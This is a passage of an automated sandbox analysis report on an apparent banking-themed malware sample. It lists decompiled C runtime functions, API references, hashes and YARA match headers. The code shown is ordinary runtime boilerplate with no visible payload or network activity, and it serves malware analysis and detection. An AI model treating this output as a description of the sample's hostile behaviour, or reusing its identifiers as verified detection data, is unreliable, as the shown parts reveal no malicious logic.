                                  0x004082a4
                                  0x004082a8
                                  0x004082ab
                                  0x004082b1
                                  0x004082b3
                                  0x004082b6
                                  0x004082ba
                                  0x004082f7
                                  0x004082fa
                                  0x004082fb
                                  0x00408300
                                  0x00408306
                                  0x0040830c
                                  0x0040831b
                                  0x00408321
                                  0x00408327
                                  0x0040832c
                                  0x00408348
                                  0x004083bb
                                  0x004083c1
                                  0x0040834a
                                  0x00408352
                                  0x0040835b
                                  0x00408361
                                  0x00000000
                                  0x00408363
                                  0x00408365
                                  0x00408368
                                  0x00408381
                                  0x00000000
                                  0x00408383
                                  0x00408387
                                  0x00408389
                                  0x0040838c
                                  0x00000000
                                  0x0040838c
                                  0x00408387
                                  0x00408381
                                  0x00408361
                                  0x0040835b
                                  0x00408348
                                  0x0040832c
                                  0x00408306
                                  0x00000000
                                  0x0040838f
                                  0x0040838f
                                  0x004083c3
                                  0x004083cd
                                  0x004083d5

                                  APIs
                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                  • __fassign.LIBCMT ref: 004082E0
                                  • __fassign.LIBCMT ref: 004082FB
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                  • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                  • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                  • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                  • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                  • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 27%
                                  			E00403632(void* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _t10;
                                  				int _t12;
                                  				int _t18;
                                  				signed int _t20;
                                  
                                  				_t10 =  *0x412014; // 0x22cc6355
                                  				_v8 = _t10 ^ _t20;
                                  				_v12 = _v12 & 0x00000000;
                                  				_t12 =  &_v12;
                                  				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                  				if(_t12 != 0) {
                                  					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                  					_t18 = _t12;
                                  					if(_t18 != 0) {
                                  						E0040C15C();
                                  						_t12 =  *_t18(_a4);
                                  					}
                                  				}
                                  				if(_v12 != 0) {
                                  					_t12 = FreeLibrary(_v12);
                                  				}
                                  				E004018CC();
                                  				return _t12;
                                  			}









                                  0x00403639
                                  0x00403640
                                  0x00403643
                                  0x00403647
                                  0x00403652
                                  0x0040365a
                                  0x00403665
                                  0x0040366b
                                  0x0040366f
                                  0x00403676
                                  0x0040367c
                                  0x0040367c
                                  0x0040367e
                                  0x00403683
                                  0x00403688
                                  0x00403688
                                  0x00403693
                                  0x0040369b

                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                  • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                  • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                  • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                  				signed int _v8;
                                  				int _v12;
                                  				char _v16;
                                  				intOrPtr _v24;
                                  				char _v28;
                                  				void* _v40;
                                  				void* __ebx;
                                  				void* __edi;
                                  				signed int _t34;
                                  				signed int _t40;
                                  				int _t45;
                                  				int _t52;
                                  				void* _t53;
                                  				void* _t55;
                                  				int _t57;
                                  				signed int _t63;
                                  				int _t67;
                                  				short* _t71;
                                  				signed int _t72;
                                  				short* _t73;
                                  
                                  				_t34 =  *0x412014; // 0x22cc6355
                                  				_v8 = _t34 ^ _t72;
                                  				_push(_t53);
                                  				E00403F2B(_t53,  &_v28, __edx, _a4);
                                  				_t57 = _a24;
                                  				if(_t57 == 0) {
                                  					_t52 =  *(_v24 + 8);
                                  					_t57 = _t52;
                                  					_a24 = _t52;
                                  				}
                                  				_t67 = 0;
                                  				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                  				_v12 = _t40;
                                  				if(_t40 == 0) {
                                  					L15:
                                  					if(_v16 != 0) {
                                  						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                  					}
                                  					E004018CC();
                                  					return _t67;
                                  				}
                                  				_t55 = _t40 + _t40;
                                  				_t17 = _t55 + 8; // 0x8
                                  				asm("sbb eax, eax");
                                  				if((_t17 & _t40) == 0) {
                                  					_t71 = 0;
                                  					L11:
                                  					if(_t71 != 0) {
                                  						E00402460(_t67, _t71, _t67, _t55);
                                  						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                  						if(_t45 != 0) {
                                  							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                  						}
                                  					}
                                  					L14:
                                  					E004063D5(_t71);
                                  					goto L15;
                                  				}
                                  				_t20 = _t55 + 8; // 0x8
                                  				asm("sbb eax, eax");
                                  				_t47 = _t40 & _t20;
                                  				_t21 = _t55 + 8; // 0x8
                                  				_t63 = _t21;
                                  				if((_t40 & _t20) > 0x400) {
                                  					asm("sbb eax, eax");
                                  					_t71 = E00403E3D(_t63, _t47 & _t63);
                                  					if(_t71 == 0) {
                                  						goto L14;
                                  					}
                                  					 *_t71 = 0xdddd;
                                  					L9:
                                  					_t71 =  &(_t71[4]);
                                  					goto L11;
                                  				}
                                  				asm("sbb eax, eax");
                                  				E004018E0();
                                  				_t71 = _t73;
                                  				if(_t71 == 0) {
                                  					goto L14;
                                  				}
                                  				 *_t71 = 0xcccc;
                                  				goto L9;
                                  			}























                                  0x004062c0
                                  0x004062c7
                                  0x004062ca
                                  0x004062d3
                                  0x004062d8
                                  0x004062dd
                                  0x004062e2
                                  0x004062e5
                                  0x004062e7
                                  0x004062e7
                                  0x004062ec
                                  0x00406305
                                  0x0040630b
                                  0x00406310
                                  0x004063af
                                  0x004063b3
                                  0x004063b8
                                  0x004063b8
                                  0x004063cc
                                  0x004063d4
                                  0x004063d4
                                  0x00406316
                                  0x00406319
                                  0x0040631e
                                  0x00406322
                                  0x0040636e
                                  0x00406370
                                  0x00406372
                                  0x00406377
                                  0x0040638e
                                  0x00406396
                                  0x004063a6
                                  0x004063a6
                                  0x00406396
                                  0x004063a8
                                  0x004063a9
                                  0x00000000
                                  0x004063ae
                                  0x00406324
                                  0x00406329
                                  0x0040632b
                                  0x0040632d
                                  0x0040632d
                                  0x00406335
                                  0x00406352
                                  0x0040635c
                                  0x00406361
                                  0x00000000
                                  0x00000000
                                  0x00406363
                                  0x00406369
                                  0x00406369
                                  0x00000000
                                  0x00406369
                                  0x00406339
                                  0x0040633d
                                  0x00406342
                                  0x00406346
                                  0x00000000
                                  0x00000000
                                  0x00406348
                                  0x00000000

                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                  • __alloca_probe_16.LIBCMT ref: 0040633D
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                  • __freea.LIBCMT ref: 004063A9
                                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                  • String ID:
                                  • API String ID: 313313983-0
                                  • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                  • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                  • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                  • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E00405751(signed int _a4) {
                                  				signed int _t9;
                                  				void* _t13;
                                  				signed int _t15;
                                  				WCHAR* _t22;
                                  				signed int _t24;
                                  				signed int* _t25;
                                  				void* _t27;
                                  
                                  				_t9 = _a4;
                                  				_t25 = 0x412fc8 + _t9 * 4;
                                  				_t24 =  *_t25;
                                  				if(_t24 == 0) {
                                  					_t22 =  *(0x40cd48 + _t9 * 4);
                                  					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                  					if(_t27 != 0) {
                                  						L8:
                                  						 *_t25 = _t27;
                                  						if( *_t25 != 0) {
                                  							FreeLibrary(_t27);
                                  						}
                                  						_t13 = _t27;
                                  						L11:
                                  						return _t13;
                                  					}
                                  					_t15 = GetLastError();
                                  					if(_t15 != 0x57) {
                                  						_t27 = 0;
                                  					} else {
                                  						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                  						_t27 = _t15;
                                  					}
                                  					if(_t27 != 0) {
                                  						goto L8;
                                  					} else {
                                  						 *_t25 = _t15 | 0xffffffff;
                                  						_t13 = 0;
                                  						goto L11;
                                  					}
                                  				}
                                  				_t4 = _t24 + 1; // 0x22cc6356
                                  				asm("sbb eax, eax");
                                  				return  ~_t4 & _t24;
                                  			}










                                  0x00405756
                                  0x0040575a
                                  0x00405761
                                  0x00405765
                                  0x00405773
                                  0x00405789
                                  0x0040578d
                                  0x004057b6
                                  0x004057b8
                                  0x004057bc
                                  0x004057bf
                                  0x004057bf
                                  0x004057c5
                                  0x004057c7
                                  0x00000000
                                  0x004057c8
                                  0x0040578f
                                  0x00405798
                                  0x004057a7
                                  0x0040579a
                                  0x0040579d
                                  0x004057a3
                                  0x004057a3
                                  0x004057ab
                                  0x00000000
                                  0x004057ad
                                  0x004057b0
                                  0x004057b2
                                  0x00000000
                                  0x004057b2
                                  0x004057ab
                                  0x00405767
                                  0x0040576c
                                  0x00000000

                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                  • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                  • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                  • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                  • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t2;
                                  				void* _t3;
                                  				void* _t4;
                                  				intOrPtr _t9;
                                  				void* _t11;
                                  				void* _t20;
                                  				void* _t21;
                                  				void* _t23;
                                  				void* _t25;
                                  				void* _t27;
                                  				void* _t29;
                                  				void* _t31;
                                  				void* _t32;
                                  				long _t36;
                                  				long _t37;
                                  				void* _t40;
                                  
                                  				_t29 = __edx;
                                  				_t23 = __ecx;
                                  				_t20 = __ebx;
                                  				_t36 = GetLastError();
                                  				_t2 =  *0x412064; // 0x7
                                  				_t42 = _t2 - 0xffffffff;
                                  				if(_t2 == 0xffffffff) {
                                  					L2:
                                  					_t3 = E00403ECE(_t23, 1, 0x364);
                                  					_t31 = _t3;
                                  					_pop(_t25);
                                  					if(_t31 != 0) {
                                  						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                  						__eflags = _t4;
                                  						if(_t4 != 0) {
                                  							E00404192(_t25, _t31, 0x4132a4);
                                  							E00403E03(0);
                                  							_t40 = _t40 + 0xc;
                                  							__eflags = _t31;
                                  							if(_t31 == 0) {
                                  								goto L9;
                                  							} else {
                                  								goto L8;
                                  							}
                                  						} else {
                                  							_push(_t31);
                                  							goto L4;
                                  						}
                                  					} else {
                                  						_push(_t3);
                                  						L4:
                                  						E00403E03();
                                  						_pop(_t25);
                                  						L9:
                                  						SetLastError(_t36);
                                  						E00403E8B(_t20, _t29, _t31, _t36);
                                  						asm("int3");
                                  						_push(_t20);
                                  						_push(_t36);
                                  						_push(_t31);
                                  						_t37 = GetLastError();
                                  						_t21 = 0;
                                  						_t9 =  *0x412064; // 0x7
                                  						_t45 = _t9 - 0xffffffff;
                                  						if(_t9 == 0xffffffff) {
                                  							L12:
                                  							_t32 = E00403ECE(_t25, 1, 0x364);
                                  							_pop(_t27);
                                  							if(_t32 != 0) {
                                  								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                  								__eflags = _t11;
                                  								if(_t11 != 0) {
                                  									E00404192(_t27, _t32, 0x4132a4);
                                  									E00403E03(_t21);
                                  									__eflags = _t32;
                                  									if(_t32 != 0) {
                                  										goto L19;
                                  									} else {
                                  										goto L18;
                                  									}
                                  								} else {
                                  									_push(_t32);
                                  									goto L14;
                                  								}
                                  							} else {
                                  								_push(_t21);
                                  								L14:
                                  								E00403E03();
                                  								L18:
                                  								SetLastError(_t37);
                                  							}
                                  						} else {
                                  							_t32 = E00405878(_t25, _t45, _t9);
                                  							if(_t32 != 0) {
                                  								L19:
                                  								SetLastError(_t37);
                                  								_t21 = _t32;
                                  							} else {
                                  								goto L12;
                                  							}
                                  						}
                                  						return _t21;
                                  					}
                                  				} else {
                                  					_t31 = E00405878(_t23, _t42, _t2);
                                  					if(_t31 != 0) {
                                  						L8:
                                  						SetLastError(_t36);
                                  						return _t31;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  			}





















                                  0x00404320
                                  0x00404320
                                  0x00404320
                                  0x0040432a
                                  0x0040432c
                                  0x00404331
                                  0x00404334
                                  0x00404342
                                  0x00404349
                                  0x0040434e
                                  0x00404351
                                  0x00404354
                                  0x00404366
                                  0x0040436b
                                  0x0040436d
                                  0x00404378
                                  0x0040437f
                                  0x00404384
                                  0x00404387
                                  0x00404389
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040436f
                                  0x0040436f
                                  0x00000000
                                  0x0040436f
                                  0x00404356
                                  0x00404356
                                  0x00404357
                                  0x00404357
                                  0x0040435c
                                  0x00404397
                                  0x00404398
                                  0x0040439e
                                  0x004043a3
                                  0x004043a6
                                  0x004043a7
                                  0x004043a8
                                  0x004043af
                                  0x004043b1
                                  0x004043b3
                                  0x004043b8
                                  0x004043bb
                                  0x004043c9
                                  0x004043d5
                                  0x004043d8
                                  0x004043db
                                  0x004043ed
                                  0x004043f2
                                  0x004043f4
                                  0x004043ff
                                  0x00404405
                                  0x0040440d
                                  0x0040440f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004043f6
                                  0x004043f6
                                  0x00000000
                                  0x004043f6
                                  0x004043dd
                                  0x004043dd
                                  0x004043de
                                  0x004043de
                                  0x00404411
                                  0x00404412
                                  0x00404412
                                  0x004043bd
                                  0x004043c3
                                  0x004043c7
                                  0x0040441a
                                  0x0040441b
                                  0x00404421
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004043c7
                                  0x00404428
                                  0x00404428
                                  0x00404336
                                  0x0040433c
                                  0x00404340
                                  0x0040438b
                                  0x0040438c
                                  0x00404396
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404340

                                  APIs
                                  • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                  • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                  • _abort.LIBCMT ref: 0040439E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_abort
                                  • String ID:
                                  • API String ID: 88804580-0
                                  • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                  • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                  • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                  • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004025BA() {
                                  				void* _t4;
                                  				void* _t8;
                                  
                                  				E00402AE5();
                                  				E00402A79();
                                  				if(E004027D9() != 0) {
                                  					_t4 = E0040278B(_t8, __eflags);
                                  					__eflags = _t4;
                                  					if(_t4 != 0) {
                                  						return 1;
                                  					} else {
                                  						E00402815();
                                  						goto L1;
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  			}





                                  0x004025ba
                                  0x004025bf
                                  0x004025cb
                                  0x004025d0
                                  0x004025d5
                                  0x004025d7
                                  0x004025e2
                                  0x004025d9
                                  0x004025d9
                                  0x00000000
                                  0x004025d9
                                  0x004025cd
                                  0x004025cd
                                  0x004025cf
                                  0x004025cf

                                  APIs
                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                    • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                  • String ID:
                                  • API String ID: 1761009282-0
                                  • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                  • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                  • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                  • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405575() {
                                  
                                  				 *0x412e78 = GetCommandLineA();
                                  				 *0x412e7c = GetCommandLineW();
                                  				return 1;
                                  			}



                                  0x0040557b
                                  0x00405586
                                  0x0040558d

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.548601003.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CommandLine
                                  • String ID: `4P
                                  • API String ID: 3253501508-1742188593
                                  • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                  • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                                  • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                                  • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%